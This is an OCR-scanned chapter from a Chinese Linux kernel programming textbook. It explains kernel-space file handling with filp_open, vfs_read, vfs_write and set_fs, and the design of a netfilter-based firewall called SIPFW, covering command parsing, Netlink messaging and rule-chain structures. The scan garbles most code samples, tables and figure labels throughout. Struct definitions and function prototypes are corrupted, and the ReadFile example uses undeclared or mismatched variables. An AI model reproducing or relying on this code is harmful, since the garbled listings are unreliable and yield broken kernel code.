不 同 ， 需 要 使 用 内 核 空间 专用 的 一 套 函 数 ， 主 要 有 filp_open()、filp_close()、vfs_read()、 
vfs_write()、set_fs()、get_fs() 和 等， 上述 函 数 在 头 文 件 linux/fs.h 和 asm/uaccess.h 中 声明 。 
20.5.1 ”内核 空间 的 文件 结构 

内 核 中 对 文件 进行 操作 的 文件 结构 struct file， 是 进行 文件 操作 时 经 常 使 用 的 结构 ， 结 
构 的 原型 定义 如 下 ,其 中 的 fop 是 对 文件 进行 操作 的 结构 , f_pos 为 文件 当前 的 指针 位 置 ; 


struct file { 


const struct file operations  *f op; /* 文 件 操作 结构 */ 
EE EPOS /* 文 件 的 当前 指针 */ 


| 

struct file_operations 结构 中 定义 的 为 一 些 内 核 文件 操作 的 函数 , 结构 的 原型 定义 如 下 ， 
例如 其 read0 成 员 函 数 从 文件 中 读 取 数 据 ，write() 成 员 函 数 向 文件 中 写 入 数据 。 

struct file operations { 


ssize rt (2read) (struct file *7 char User #7 Blze tr loff t *)s 
/* 从 文件 中 读 取 数 据 */ 
ssize 七 (*write) (struct file *, const char user # Size 七 loff t *#); 


/* 向 文件 中 写 入 数据 */ 


}; 


20.5.2 ”内 核 空间 的 文件 建立 操作 
内 核 中 打开 文件 不 能 调用 用 户 空间 的 库 函 数 ， 而 且 内 核 空间 和 用 户 空间 打开 文件 的 函 
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数 不 同 ， 内 核 中 的 打开 文件 函数 为 flp_open0， 其 原型 如 下 : 


struct file *filp open(const char *filename, int flags, int mode); 


filp_open() 函 数 用 于 打开 路 径 filename 下 的 文件 , 返回 一 个 指向 结构 strcut file 的 指针 ， 
后 面 的 函数 使 用 这 个 指针 对 文件 进行 操作 ， 返 回 值 需要 使 用 宏 IS”_ ERR() 函 数 来 检验 其 有 
效 性 。 
参数 说 明 如 下 所 述 。 
口 filename: 要 打开 或 者 创建 的 文件 名 称 ， 包 含 路 径 部 分 。 在 内 核 中 使 用 打开 文件 的 
函数 容易 出 现 打开 文件 时 机 不 对 的 错误 ， 例 如 当 调 用 此 函数 时 ， 文 件 的 驱动 没有 
加 载 ， 或 者 打开 的 文件 没有 挂 载 到 系统 中 。 
口 open_mode: 设置 文件 的 打开 方式 ， 这 个 值 与 用 户 空间 open 的 对 应 参数 类 似 ， 可 
以 取 例 如 O_CREAT、O RDWR、O RDONLY 等 值 。 
口 mode: 这 个 参数 只 有 在 创建 文件 时 使 用 ， 用 于 设置 创建 文件 的 读 写 权 限 ， 不 创建 
文件 的 其 他 情况 可 以 忽略 ， 设 为 0。 
struct file *myfile = NULL; /* 文 件 指针 */ 


int OpenFile (void) 


const char *filename = "/etc/sipfw.conf"; /* 要 打开 文件 的 路 径 #/ 
myfile = filp_open(filename, O_CREAT|O WRONLY|O APPEND, 0); 
/* 打 开 文 件 */ 
if (!myfile || IS_ERR (myfile)) /* 判 断 是 否 打开 文件 成 功 */ 
return -1; /* 打 开 失 败 */ 
return 0; /* 打 开 成 功 */ 


} 


20.5.3 ”内 核 空间 的 文件 读 写 操作 


Linux 内 核 中 对 文件 进行 读 写 操作 的 函数 为 vfs_read() 函 数 和 vfs_write() 函 数 ， 这 两 个 
函数 的 原型 如 下 所 示 。 函 数 的 基本 含义 与 用 户 空间 是 基本 一 致 的 。 
ssize tvfs read(struct file*filp, char user* buffer, size t len, loff t*pos); 
Ssize t vfs write(struct file* filp, const char _user* buffer, size t len, 
loff t+ pos); 
这 两 个 函数 的 参数 含义 如 下 所 述 。 
口 filp: 文件 指针 ， 由 filp_open() 函 数 返 回 。 
口 buffer: 缓冲 区 ， 从 文件 中 读 出 的 数据 放 到 这 个 缓冲 区 ， 向 文件 中 写 入 的 数据 也 在 
这 个 缓冲 区 。 
len: 从 文件 中 读 出 或 者 写 入 文件 的 数据 长 度 。 
pos: 为 文件 指针 的 位 置 ， 即 从 什么 地 方 开始 对 文件 进行 数据 操作 。 


全 注意 : vfs_read() 和 vfs_write() 这 两 个 函数 的 第 二 个 参数 ， 在 buffer 前 面 都 有 一 个 _user 
修饰 符 ， 这 要 求 buffer 指针 应 该 指向 用 户 空间 的 地 址 。 如 果 在 内 核 中 使 用 上 述 的 
两 个 函数 直接 进行 文件 操作 ， 将 内 核 空 间 的 指针 传 入 的 时 候 ， 函 数 会 返回 失败 
EFAULT。 但 在 Linux 内 核 中 ， 一 般 不 容易 生成 用 户 空间 的 指针 ， 或 者 不 方便 独 
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立 使 用 用 户 空间 内 存 。 为 了 使 这 两 个 函数 能 够 正常 工作 ， 必 须 使 得 这 两 个 函数 能 
够 处 理 内 核 空 间 的 地 址 。 


使 用 set_fs0) 函 数 可 以 指定 上 述 两 个 函数 对 缓冲 区 地 址 的 处 理 方式 。 其 原型 如 下 : 


void set fs(mm segment +t fs); 


这 个 函数 改变 内 核对 内 存 检 查 的 处 理 方式 ， 将 内 存 地 址 的 检查 方式 设置 为 用 户 指定 的 
方式 。 参 数 fs 可 取 的 值 有 两 个 : USER_DS 和 KERNEL DS，USER_DS 代表 用 户 空间 ， 
KERNEL _DS 代表 内 核 空间 。 

在 默认 情况 下 ， 内 核对 地 址 的 检查 方式 为 USER_DS， 即 按照 用 户 空 间 进 行 地 址 检查 
并 进行 用 户 地 址 空间 到 内 核 地 址 空间 的 变换 。 如 果 函 数 中 要 使 用 内 核 地 址 空间 ， 需 要 使 用 
set_ fs (KERNEL _DS) 函数 进行 设置 。 与 set_fs() 函 数 对 应 ，get_fs() 函 数 获得 当前 的 设置 ， 
在 使 用 set_fs() 函 数 的 时 候 要 先 调用 get_fs() 函 数 获得 之 前 的 设置 ， 对 文件 进行 操作 后 ， 使 
用 set_fs() 函 数 还 原 之 前 的 设置 。 内 核 空间 文件 的 读 写 框 架 为 : 


mm segment t old fs; /* 原 来 的 地 址 空间 设置 */ 
old fs = get fs(); /* 获 得 原来 的 地 址 空间 设置 */ 
set fs (KERNEL DS); /* 设 置 为 内 核 空 间 */ 

eR /* 文 件 读 写 操作 */ 

set fsl(old fs); /* 还 原 地 址 空间 设置 方式 */ 


从 注意 : 使 用 函数 vfs_read() 和 vfs_write() 的 时 候 ， 要 注意 最 后 的 参数 loff t * pos，pos 所 
指向 的 值 必 须要 进行 初始 化 ， 表 明 从 文件 的 什么 位 置 进行 读 写 。 使 用 此 参数 可 以 
对 读 写 文件 的 位 置 进行 指定 ， 这 可 以 完成 用 户 空间 中 lseek() 函 数 的 功能 。 
下 面 是 一 个 使 用 内 核 空 间 的 文件 读 函 数 从 文件 中 读 取 数 据 的 例子 : 


ssize t ReadFile(struct file* filp, char _ user* buffer, size t len, loff t* pos) 
{ 


ssize t count = 0; /* 读 取 文件 的 字 节 数 */ 
oldfs = get fs(); /* 获 得 之 前 的 地 址 设置 */ 
set_ fs (KERNEL DS); /# 设 置 为 内 核 地 址 空间 模式 */ 
count = file->f op->read(filp, buf, len, &file->f pos) 

/* 读 取 数 据 */ 
set fs(oldfs); /* 还 原 地 址 空间 设置 */ 
return count; /* 返 回 字 节 数 #/ 


4 


20.5.4 内核 空间 的 文件 关闭 操作 


内 核 中 的 文件 如 果 不 再 使 用 ， 需 要 将 文件 进行 关闭 ， 释 放 其 中 的 资源 。Linux 内 核 中 
关闭 文件 的 函数 为 flp_close()， 其 原型 如 下 : 


int filp closel(struct file*filp, fl owner t id); 


函数 用 于 关闭 之 前 打开 的 文件 ， 函 数 的 第 一 个 参数 为 filp_ open(0 返 回 的 指针 ， 第 二 个 
参数 是 POSIX 线程 ID。Linux 内 核 中 使 用 文件 指针 可 以 传 入 NULL, 或 者 使 用 current->files 
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传 入 当前 模块 的 文件 指针 。 
void CloseFile(void) 
if (myfile) /* 文 件 指针 是 否 合法 */ 
filp close(myfile,current->files); /* 关 闭 文件 */ 


20.6 SIPFW 防火 墙 的 模块 分 析 和 设计 


在 防火 墙 的 功能 明确 之 后 ， 需 要 对 实现 功能 的 技术 方案 进行 详细 的 设计 ， 包 含 主要 的 
实现 技术 方案 、 措 施 等 。 本 节 将 对 防火 墙 的 架构 、 用 户 命令 解析 的 实现 方式 、 用 户 空间 和 
内 核 空间 的 交互 、 规 则 链 的 表达 方式 、PROC 虚拟 系统 、 配 置 文件 的 读 取 方 式 、 网 络 数据 
的 过 滤 方 法 进行 细致 地 介绍 。 


20.6.1 SIPFW 防火 墙 的 总 体 架构 


SIPFW 防火 墙 的 总 体 架构 设计 如 图 20.8 所 示 , 分 为 两 个 主要 的 部 分 : 内 核 空间 部 分 的 
主要 处 理 模块 和 用 户 空 间 部 分 的 交互 控制 用 户 接口 。 


1. 总 体 架构 的 组 成 


内 核 模块 主要 处 理 网 络 数据 的 过 滤 、 防 火 墙 过 滤 规 则 的 增删 、 日 志 记录 、 防 火 墙 的 总 
体 控制 参数 控制 等 。 

用 户 空间 部 分 主要 处 理 用 户 输入 的 命令 格式 解析 、 用 户 空间 与 内 核 空间 的 通信 ， 此 外 
还 可 以 查看 防火 墙 的 日 志文 件 、 查 看 PROC 虚拟 文件 获取 防火 墙 的 一 些 状态 值 ， 通 过 修改 
配置 文件 可 以 配置 防火 墙 的 启动 参数 。 


2. 总 体 架构 的 实现 方法 


内 核 模块 中 的 钧 子 函数 是 防火 墙 网 络 数据 的 主要 处 理 部 分 ， 按 照 用 户 定义 的 过 滤 规 
则 ， 对 通过 netfilter 架构 上 INPUT、OUTPUT、FORWARD 这 3 个 监视 点 的 网 络 数据 进行 
过 滤 ， 目 前 实现 ACCEPT 和 DROP 两 种 处 理 方式 。 网 络 数据 进入 网 络 协议 栈 后 ，netfilter 
架构 有 5 个 钩子 ， 用 户 调用 插入 的 回调 函数 ， 当 用 户 设置 了 回调 函数 之 后 ， 就 会 进入 用 户 
的 处 理 过 程 。SIPFW 防火 墙 选择 了 上 述 3 个 ， 对 进入 本 机 、 从 本 机 发 出 、 从 本 机 转发 的 数 
据 进 行 处 理 。 

内 核 中 与 用 户 的 通信 采用 了 Netlink 的 框架 进行 处 理 。 内 核 建 立 一 个 私有 的 Netlink 通 
信 类 型 ， 与 用 户 的 通信 通过 此 类 型 的 套 接 字 进行 处 理 。 此 模块 中 用 于 处 理 用 户 对 过 滤 规 则 
的 增加 、 删 除 、 列 表 、 清 除 等 操作 。 当 模块 接 到 用 户 空间 发 送 来 的 数据 后 ， 根 据 其 操作 方 
式 ， 对 过 滤 规 则 链表 中 的 规则 进行 增加 、 插 入 、 删 除 、 清 除 等 操作 ， 并 将 结果 发 送 给 用 户 ， 
如 果 用 户 的 操作 是 获得 规则 列表 ， 则 将 当前 规则 链表 中 的 规则 发 送 给 用 户 。 

内 核 中 的 PROC 文件 系统 用 于 将 防火 墙 中 的 信息 展示 给 用 户 空 间 ， 主 要 包括 防火 墙 的 
配置 信息 、 过 滤 规 则 的 命中 情况 ， 并 可 以 调整 防火 墙 的 默认 动作 、 设 置 防 火 墙 的 有 效 性 、 
中 止 日 志 记录 文 件 等 。 
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用 户 空间 
用 户 命令 解析 | prod 避让 
虚拟 | | 记录 四 
文件 | 文人 文人 
和 内 核 模块 交互 | ”| 交互 
内 核 空间 
和 用 户 命令 交互 


规则 链 日 志文 件 记录 控制 参数 
1 


NETFILTER 


网 络 协议 栈 


网 络 
图 20.8 SIPFW 的 总 体 架构 简 图 


用 户 空 间 主 要 用 于 与 防火 墙 进行 交互 , 通过 NETLINK 网 络 协议 与 SIPFW 防火 墙 进行 
规则 的 设置 、 删 除 、 查 看 规则 列表 信息 等 。 用 户 空 间 主 要 分 为 命令 行 解析 和 内 核 通 信 ， 命 


令 行 解析 用 GNU 的 系统 函数 进行 处 理 ， 通 信和 部 分 则 将 用 户 的 合法 输入 发 给 用 户 ， 关 


果 显 示 出 来 。 


日 志文 件 获得 


将 结 


用 于 空间 可 以 查看 PROC 文件 系统 获取 当前 防火 墙 的 设置 情况 ， 还 可 以 查看 
防火 墙 对 规则 的 命中 信息 的 提示 。 


内 核 模块 和 用 户 模块 之 间 的 关系 如 图 20.9 所 示 ， 内 核 模块 在 启动 的 时 候 读 取 配 置 文 
件 ， 获 取 配 置信 息 ， 构 建 NETLINK 用 户 空间 通信 模块 、 初 始 化 PROC 虚拟 文件 系统 、 初 
始 化 netfilter 钩子 处 理 函 数 。 这 3 个 部 分 初始 化 成 功 后 ， 内 核 程序 监听 用 户 交 互 和 网 络 数 
据 的 到 来 。 用户 的 Netlink 部 分 与 内 核 的 Netlink 部 分 进行 交互 ， 对 防火 墙 的 过 滤 规 则 进行 处 
理 。PROC 虚拟 文件 系统 对 系统 的 基本 参数 进行 控制 。 钧 子 函数 则 会 对 网 络 数据 进行 处 理 。 


20.6.2 SIPFW 防火 墙 的 用 户 命令 解析 
SIPFW 防火 墙 与 用 户 的 交互 采用 命令 行进 行 ， 通 过 对 用 户 命令 进行 解析 ， 向 内 核发 送 


。0645。 


解析 配 
多 i 
置 参数 i 


INPUT 
OUTPUT 
FORWARD 
规则 链 


规则 化 的 用 户 输入 


图 20.9 用 户 空间 和 内 核 空间 模块 之 间 的 关系 


1. 用 户 输入 命令 的 格式 
用 户 输入 的 命令 格式 如 下 : 


sipfw --chain 链 名 称 --action 动作 名 称 --source 源 主机 IP --dest 目的 主机 IP 
--sport 源 端 口 --dport 目的 端口 -protocol 协议 名 称 -interface 网 络 接 口 名 称 


部 
二 


乔 户 命令 


行 的 解析 使 用 getopt_long() 函 数 来 进行 ， 用 户 输入 参数 的 命令 行 参 数 及 含 


义 如 表 20.3 所 示 。 


j 户 的 一 个 必需 的 命令 包含 项 是 用 户 的 命令 类 型 , 这 是 对 规则 进行 插入 、 


删除 、 列 表 、 


清空 的 某 个 选项 。 其 他 的 参数 为 可 以 选择 的 参数 。 表 20.3 中 的 内 容 “ 映 射 字 


符 ” 为 getopt_long0 函 数 对 用 户 输入 进行 判定 的 依据 ， 根 据 不 同 的 映射 字符 ， 对 其 后 的 参 


数 进行 判定 和 转换 。 
表 20.3 用 户 输入 的 命令 行 参数 和 含义 
选 项 映射 字符 
链 链 的 名 称 C 
动作 i 
源 主机 S 
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选 项 参数 变 短 变量 映射 字符 
目的 主机 目的 主机 他 (可 选 》 d d 
源 端口 源 端口 地 址 (可 选 》 m 
目的 端口 目的 端口 地 址 (可 选 》 dport n 


协议 类 型 协议 类 型 名 称 (可 p p 
网 络 接口 网 络 接口 的 名 称 interface i n 
删除 规则 delete e e 
列 出 规则 链 的 名 称 〈 ) list 1 1 
位 置 数值 number u 


2. 防火 墙 所 支持 的 链 


SIPFW 防火 墙 支持 进入 、 发 出 、 转 发 3 个 链 ， 其 定义 参见 表 20.4。 例 如 ， 进 入 链 的 名 
称 为 INPUT， 用 常量 SIPFW_CHAIN_INPUT 表示 。 


表 20.4 防火墙 的 规则 链 


链 名 称 值 

INPUT 发 往 本 机 的 网 络 数据 SIPFW_CHAIN INPUT 
OUTPUT SIPFW_CHAIN_OUTPUT 
FORWARD 通过 本 机 转发 的 网 络 数据 SIPFW CHAIN FORWARD 


3. 防火 墙 支持 的 命令 


SIPFW 防火 墙 支持 INSERT 插入 、DELETE 删除 、APPEND 尾部 增加 、LIST 规则 列 
表 、FLUSH 清空 规则 5 个 命令 ， 其 含义 和 命令 选项 参见 表 20.5 所 示 。 


表 20.5 防火 墙 的 命令 


命令 名 称 含义 值 命令 长 选项 令 短 选项 
INSERT 指 人 的 a SIPFW_CMD_INSERT --insert 
DELETE 全 et 翘 除 规则 ,可以 SIPFW_CMD DELETE | --delete D 
APPEND 向 某 个 链 的 尾部 插入 规则 SIPFW CMD APPEND | --append A 
LIST 六 er ee ee 下 党 SIPFW_CMD_LIST --list 工 
FLUSH ER i 区 SIPFW_CMD FLUSH -flush 下 


4. 防火 墙 支 持 的 协议 
SIPFW 防火 墙 支持 根据 网 络 数据 的 协议 进行 过 滤 ， 支 持 TCP、UDP、ICMP 和 IGMP 
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共 4 种 协议 类 型 ， 如 表 20.6 所 示 。 
表 20.6 ”防火 墙 可 以 过 滤 的 协议 类 型 


协议 名 称 值 
tcp TCP 协议 IPPROTO_TCP 
udp UDP 协议 IPPROTO_UDP 
icmp ICMP 协议 IPPROTO ICMP 
igmp IGMP 协议 IPPROTO IGMP 


5. 防火 墙 支持 的 动作 
SIPFW 防火 墙 的 动作 目前 仅 支持 丢弃 和 通过 两 种 ， 其 中 DROP 表示 丢弃 网 络 数据 ， 
ACCEPT 表示 让 网 络 数据 正常 通过 ， 不 对 数据 进行 处 理 ， 如 表 20.7 所 示 。 
表 20.7 防火 墙 的 动作 类 型 


动作 名 称 什 
DROP 丢弃 网 络 数据 SIPFW_ACTION DROP 


ACCEPT 正常 通过 ， 不 对 数据 进行 处 理 SIPFW_ACTION ACCEPT 


6. 用 户 命 令 对 应 的 值 


用 户 输入 的 命令 选项 为 字符 串 , 要 将 用 户 的 输入 转化 为 可 以 理解 的 值 , 需要 进行 转化 ， 
如 表 20.8 所 示 。 用 户 的 输入 分 为 表 中 所 示 的 儿 种 类 型 。 对 各 种 不 同类 型 的 处 理 方式 和 获得 
转化 后 的 值 不 同 。 


表 20.8 防火 墙 的 选项 类 型 


选项 类 型 含义 转化 后 类 型 
SIPFW_OPT_CHAIN 链 名 称 unsigned int 
SIPFW_OPT_ACTION 动作 名 称 unsigned int 
SIPFW_OPT PP 将 字符 串 转 为 网 络 字 节 序 unsigned int 
SIPFW_OPT_PORT 将 字符 串 类 型 转 为 网 络 序 unsigned int 
SIPFW_OPT PROTOCOL 将 协议 的 名 称 转 为 值 unsigned int 
SIPFW_OPT _ STR 字符 串 直 接 复制 char* 


口 SIPFW_OPT_CHAIN 选项 类 型 的 用 户 输入 为 链 名 称 的 字符 串 ， 需 要 查找 表 20.4 所 
示 的 链 的 名 称 ， 并 获得 用 户 输入 链 的 值 。 

口 SIPFW_OPT _ ACTION 选项 类 型 为 用 户 的 输入 为 动作 类 型 ， 需 要 查找 表 20.7 所 示 
的 字符 串 并 获得 对 应 的 值 。 

口 SIPFW_OPT IP 选项 类 型 表示 用 户 的 输入 为 IP 地 址 , 需要 使 用 函数 inet_add() 进 行 
点 分 四 段 式 IP 地 址 到 网 络 字 节 序 无 符号 整 型 的 转换 。 

口 SIPFW_OPT PORT 选项 类 型 表示 用 户 的 输入 为 端口 ， 使 用 函数 strtoul() 进 行 字符 
串 到 无 符号 整 型 的 转换 ， 然 后 将 结果 使 用 函数 htonl0 转 换 为 网 络 字 节 序 。 
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口 SIPFFW_OPT_PROTOCOL 选项 类 型 表示 用 户 的 输入 为 协议 类 型 ， 需 要 查找 表 20.6 
所 示 的 协议 字符 串 并 获得 协议 类 型 的 值 。 
口 SIPFW_OPT _STR 选项 表示 用 户 的 输入 为 字符 串 ， 例 如 网 络 接口 名 称 。 
为 了 方便 操作 ， 定 义 如 下 所 示 的 一 个 联合 类 型 ， 其 中 不 同 的 类 型 用 于 不 同 的 目标 值 的 
保存 。 例 如 ，v_uint 成 员 可 以 将 几乎 所 有 的 目标 类 型 都 放 入 ， 而 v_str 可 以 保存 网 络 接口 的 
名 称 。 


union sipfw variant { /* 变 量 枚 举 类 型 */ 
char v_str[8]; /* 字 符 串 */ 
int vinty /* 符 号 整 型 */ 
unsigned int v_uint; /* 无 符号 整 型 +/ 


| 


定义 如 下 用 于 命令 解析 的 结构 ， 其 中 的 成 员 为 上 述 的 sipfw_variant 联合 结构 。 用 于 保 
存 命令 类 型 、 源 地 址 、 目 的 地 址 、 源 端口 、 目 的 端口 、 协 议 类 型 、 动 作 等 参数 。 


struct sipfw cmd opts { 


union sipfw variant command; /* 命 令 */ 
union sipfw variant source; /* 源 地 址 */ 
union sipfw variant dest; /* 目 的 地 址 */ 
union sipfw variant sport; /* 源 端口 */ 
union sipfw variant dport; /* 目 的 端口 */ 
union sipfw variant protocol; /* 协 议 类 型 */ 
union sipfw variant chain; /* 链 */ 
union sipfw variant ifname; /* 网 络 接口 */ 
union sipfw variant action; /* 动 作 */ 
union addtion addtion; /* 附 件 项 */ 
union sipfw variant number; /* 增 加 或 者 删除 的 序号 */ 


}; 


7. 防火 墙 的 命令 处 理 过 程 

SIPFW 防火 墙 对 用 户 输入 命令 的 处 理 过 程 如 图 20.10 所 示 ， 先 调用 getopt_long() 函 数 
获取 全 部 的 参数 ， 将 不 同 含义 类 型 的 命令 参数 进行 分 类 ， 分 别 解析 ， 最 后 获得 用 户 的 命令 
规则 形式 。 
20.6.3 SIPFW 用 户 空 间 与 内 核 空 间 的 交互 

SIPFW 防火 墙 内 核 和 用 户 空间 的 通信 使 用 NETLINK (之 后 简称 NL)。 

1. NL 的 数据 结构 


通过 NL 消息 结构 struct nlmsghdr 和 NL 的 地 址 类 型 struct sockaddr_nl 来 实现 通信 。 地 
址 结构 的 数据 结构 示意 图 如 图 20.11 所 示 ， 发 送 和 接收 的 数据 在 NL 消息 结构 的 后 面 ， 两 
种 数据 连续 存放 ， 缓 冲 区 的 长 度 为 nimsg_len 的 长 度 ， 它 包含 紧 跟 在 其 后 的 有 用 数据 。 
户 空 间 按照 图 20.11 来 实现 的 数据 结构 如 下 ， 用 户 空间 的 接收 和 发 送 使 用 同一 个 
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getopt_long| 


“d 一 目的 主机 IP 


“w 一 规则 的 位 置 


“mm 一 源 端口 地 起 


实 一 目的 端口 地 志 


工 一 规则 列表 


下 一 清空 规则 


A 一 尾部 增加 规则 


TT 一 插入 规则 到 链 


“D 一 删除 规则 


于 一 网 络 接口 


一 协议 类 型 | 


案 例 


SIPFWOPT_IP 


SIPFWOPT- PORT 


SIPFW_OPT_ PROTOCOL, 


SIPFWOPT_CHATN| 


SIPFW_OPT_STR| 


一 动作 


ASIPFWOPT_ACTION 


图 20.10 命令 行 解析 处 理 过 程 


struct nlmsghdr 


1 nlmsg_len D_LEN 
nlmsg_trpe 
nimsg_flags 0 
nlmsg_ seq 
D_LEN nlmsg_pid 0 
数据 
了 


struct sockaddr_nl 
nl_family 

nl_pad 

nl_pid 

nl_groups 


图 20.11 NL 的 收发 消息 示意 图 


union response 


由 


char info str[128]; 
struct sipfw rules rule; 


"50. 


/* 联 合 类 型 */ 


/*128 个 字符 串 ,方便 处 理 #/ 
/* 存 放 用 户 发 给 的 规则 结构 */ 


解析 参数 
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unsigned int count; /* 获 得 规则 列表 命令 时 发 送 的 规则 个 数 */ 
}; 
struct packet u /* 用 户 空间 的 消息 结构 */ 
dl 
struct nlmsghdr nlmsgh; /*NL 私有 消息 */ 
union response payload; /* 负 载 部 分 */ 
}; 


2. NL 的 处 理 过 程 


内 核 空间 的 数据 结构 接收 的 时 候 使 用 系统 的 结构 struct sk_buff， 将 其 data 部 分 强制 转 
换 为 struct nlmsghdr 会 获得 NL 消息 的 结构 。 

在 内 核发 送 响应 数据 的 时 候 ， 需 要 临时 申请 空间 ， 发 送 完毕 会 释放 申请 的 资源 ， 使 用 
alloc_skb(0) 函 数 可 以 申请 一 个 struct sk_buff 结构 ， 将 需要 发 送 的 消息 和 数据 共同 构成 缓冲 
区 数据 ， 发 送 使 用 函数 netlink_unicast()。 

用 户 和 内 核 空间 的 处 理 过 程 如 图 20.12 所 示 。 分 为 用 户 空 间 处 理 过 程 和 内 核 空间 处 理 
过 程 ， 在 用 户 空 间 的 程序 运行 之 前 ， 应 该 将 内 核 空 间 的 模块 先 启动 。 

用 户 空间 的 过 程 分 为 建立 NL 套 接 字 、 发 送 数据 、 接 收 响应 和 关闭 NL 套 接 字 ， 由 于 
用 户 每 次 只 有 一 个 命令 ， 所 以 只 能 发 送 一 次 。 发 送 数据 的 时 候 ，struct nl_addr 类 型 变量 to 
成 员 nl_pid 的 值 要 设置 为 0， 表示 数据 是 给 内 核 的 。 

对 于 获得 防火 墙 规则 列表 的 命令 ， 用 户 发 送 命令 后 ， 内 核 分 为 两 个 步骤 来 响应 命令 ; 
先 计算 内 核 中 规则 的 总 数 ， 发 送 给 客户 端 ， 方 便 用 户 空 间 进行 处 理 ， 然 后 遍历 3 个 链表 中 
的 规则 ， 逐 个 读 出 链表 中 的 规则 ， 将 规则 数据 打包 后 发 送 给 用 户 空 间 。 

内 核 空 间 NL 的 过 程 需要 先 使 用 netlink kernel_create0 函 数 挂 接 一 个 NL 处 理 函 数 , 当 
用 户 的 请 求 到 达 时 ， 会 根据 NL 的 协议 类 型 调用 不 同 的 处 理 函 数 ，SIPFW 防火 墙 定义 了 一 
个 私有 的 类 型 : 


#define NL SIPFW 31 


回调 函数 在 合适 的 协议 类 型 请 求 到 达 时 , 先 从 接收 的 链 上 将 数据 摘 下 , 这 是 一 个 struct 
sk_buff 结构 ,结构 的 data 部 分 为 用 户 发 送 的 消息 ,如 图 20.12 所 示 。data 部 分 包含 结构 struct 
nlmsghdr 和 负载 部 分 ， 取 出 消息 结构 和 负载 后 调用 处 理 过 程 对 消息 进行 处 理 。 发 送 响应 的 
过 程 与 接收 相反 ,申请 一 个 struct sk_buff 结构 ,按照 图 20.12 所 示 规则 化 结构 的 data 部 分 ， 
将 结构 struct nlmsghdr 放 在 缓冲 区 前 面 ， 后 面 为 要 发 送 的 负载 ， 最 后 调用 netlink_unicast() 
函数 发 送出 去 。 接 收 数据 的 struct sk_buff 结构 由 于 从 接收 链 上 摘 取 下 来 了 ， 在 处 理 完毕 用 
户 命令 后 ， 需 要 进行 释放 ， 使 用 函数 kfree_skb()。 


20.6.4 SIPFW 防火 墙 内 核 链 上 的 规则 处 理 
SIPFW 内 核 的 链 是 通过 结构 struct sipfw_rules 来 组 成 的 。 
1. 防火 墙 的 sipfw_rules 结构 定义 


这 个 结构 描述 一 个 规则 包含 链 的 值 、 源 他 地 址 、 目 的 他 地 址 、 源 端口 、 目 的 端口 、 协 
议 类 型 、 规 则 的 动作 、 规则 指定 的 网 络 接口 。 在 内 核 模块 中 用 next 指针 将 链 中 的 规则 连 起 来 ， 
昌 户 空间 使 用 这 个 结构 主要 是 在 获得 规则 列表 的 时 候 ， 对 规则 进行 分 析 后 打印 给 用 户 。 


“Sl 


第 4 篇 综合 案例 


建立 NL 套 接 字 
发 送 数据 
sendto( s, 


struct sipfw—cmd_opts cmd_opt;| 


nl_family 
nl_pad 
npid 


struct sockaddr_nl 


消息 记 有 者 的 PID 
送 给 内 核 ”nimsg_pid=getpid 0; 
id=0; 


数据 的 长 度 为 消息 长 度 
AR nlmsghdr, 
| 


nl_groups 


从 内 核 接收 数据 


nl_pld= 


*from, 
&frimlen): 


nimsg— en 


回调 函数 


缓冲 区 长 度 


Struct sk_brff *skb ;| 


IN 


skb_dequeue(&sk—sk_receive_qrere); 


2 


struct nlmsghdr *nih = (struct nlmsghdr*)skb 一 data;| 


char *payload= NLMSG_DATA(nIh); 


处 理 消息 


关闭 NL 套 接 字 


发 送 响应 


struct sipfw_rulesi 


int 

— be32 
— be32 
Sbel6 
_bel6 


"652. 


kfree_skb (skb)} 


图 20.12 ”内核 和 用 户 通信 的 NL 过 程 


chain; /* 链 */ 
source; /* 源 地 址 */ 
dest; /* 目 的 地 址 */ 
sport; /# 源 端口 */ 
dport; /* 目 的 端口 */ 
protocol; /* 协 议 类 型 */ 
action; /* 动 作 */ 
ifname[8]; /* 网 络 接口 */ 
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union addtion addtion; /* 附 加 选项 */ 

#ifdef KERNEL _ /* 如 果 是 内 核 中 则 可 以 使 用 如 下 的 指针 将 规则 连 起 来 */ 
struct sipfw rules* next;  /* 下 一 个 #/ 

#endif 


}; 


内 核 中 共有 3 个 链 ， 分 别 是 INPUT、OUTPUT、FORWARD 链 ， 链 中 的 规则 可 以 使 用 
上 述 的 结构 struct sipfw_rules 来 表达 。 表 示 链 的 数据 结构 是 struct sipfw_list， 建 立 3 个 此 类 
型 变量 ， 分 别 表示 3 个 链 ， 其 中 rule 指向 规则 列表 的 第 一 个 ，number 是 链 中 规则 的 个 数 。 


struct sipfw list 


struct sipfw rules *rule; /* 链 中 的 规则 头 指针 */ 
int number; /* 链 中 规则 的 个 数 */ 


}; 


2. 防火 墙 3 个 链 之 间 的 关系 


如 图 20.13 所 示 ， 展 示 了 内 核 中 的 3 个 链 及 规则 列表 的 构成 方式 。3 个 链 为 INPUT、 
OUTPUT 和 FORWARD, 其 中 的 rule 成 员 变量 分 别 指向 各 自 链 的 规则 成 员 的 首部 ， 可 以 通 


struct sipfw_rules *rule; | INPUT 链 


int number| 
struct sipfw_rules *rule; |OUTPUT 链 


int number| 


struct sipfw_rules *#rule; | FORWARD 链 


int chain int number| 
-be32 source ee 
_be32 _ dest 

bel6 sport 

_be16 dport 

_u8 puotocol 

int action 

-ug8 ifname [8] 

addtion addtion 

Sipfw_rules*next next 


int chain 
-be32 Source 
-be32 dest 
—bel6 ”sport 
be1l6 dport 
-u8 puotocol 
int action 


-ug ifname [8] 
laddtion addtion 
sipfw_rules*next 


图 20.13 ”防火 墙 规则 链表 的 构成 
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过 对 各 个 链 头 部 的 访问 获得 链 的 数据 。 规 则 链 中 可 以 使 用 next 域 将 各 个 规则 连接 起 来 ， 当 


next 的 值 为 NULL 时 ， 表 示 一 个 链 的 结束 。 


3. 防火 墙 附加 规则 数据 结构 


在 图 20.13 中 ， 有 一 个 联合 变量 union addition addition, 这 是 用 于 保存 附加 规则 项 的 变 
量 。 成 员 addtion 主要 用 于 表示 TCP、ICMP、IGMP 中 的 比较 细节 的 规则 ， 例 如 TCP 中 连 
接 时 的 SYN、 断 开 时 的 FIN，ICMP 和 IGMP 协议 中 的 类 型 和 代码 。 结 构 的 原型 如 下 : 


union addtion 


{ 
2 valid; 


struct icgmp flag icgmp; 
struct tcp flag tcp; 


/* 附 加 项 */ 


/* 附 加 项 是 否 有 效 */ 
/*ICMP 和 IGMP 的 类 型 和 代码 */ 
/*TCP 状态 */ 


}; 
ICMP 协议 和 IGMP 协议 的 附加 项 是 一 致 的 ， 都 只 需要 类 型 和 代码 。 而 TCP 的 附加 项 
仅 实 现 了 SYN 和 FIN， 原 型 如 下 : 


